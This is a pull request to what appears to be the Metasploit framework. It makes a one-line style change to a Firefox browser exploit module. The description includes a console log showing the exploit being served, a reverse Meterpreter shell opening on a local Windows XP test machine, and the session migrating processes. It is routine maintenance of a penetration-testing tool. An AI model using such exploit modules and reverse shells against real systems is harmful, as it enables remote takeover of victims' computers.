### PR TITLE
Favor unless over if for negative condition

### DIFF
--- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb
+++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		if agent !~ /Firefox\/17/ and agent !~ /Firefox\/21/
+		unless agent =~ /Firefox\/(17|21)/
 			print_error("Browser not supported, sending 404: #{agent}")
 			send_not_found(cli)
 			return


### PR DESCRIPTION
The condition isn't broken now, but we are going to favor unless over if for negative condition, as recommended on the Ruby Style guide, and pointed by @todb-r7 on #2217.

Verifying module is working after changes:

```
msf > use exploit/windows/browser/mozilla_firefox_onreadystatechange 
msf exploit(mozilla_firefox_onreadystatechange) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/WlhfB1WXDadtp0
[*]  Local IP: http://192.168.0.3:8080/WlhfB1WXDadtp0
[*] Server started.
msf exploit(mozilla_firefox_onreadystatechange) > [*] 192.168.0.3      mozilla_firefox_onreadystatechange - URI /WlhfB1WXDadtp0 requested...
[*] 192.168.0.3      mozilla_firefox_onreadystatechange - Sending HTML
[*] 192.168.0.3      mozilla_firefox_onreadystatechange - URI /WlhfB1WXDadtp0/iframe.html requested...
[*] 192.168.0.3      mozilla_firefox_onreadystatechange - Sending iframe HTML
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:60269) at 2013-08-13 08:45:09 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:60269) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: firefox.exe (2380)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1712
[+] Successfully migrated to process 

msf exploit(mozilla_firefox_onreadystatechange) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\juan @ JUAN-C0DE875735  192.168.0.3:4444 -> 192.168.0.3:60269 (192.168.0.3)

msf exploit(mozilla_firefox_onreadystatechange) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
eComputer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

```
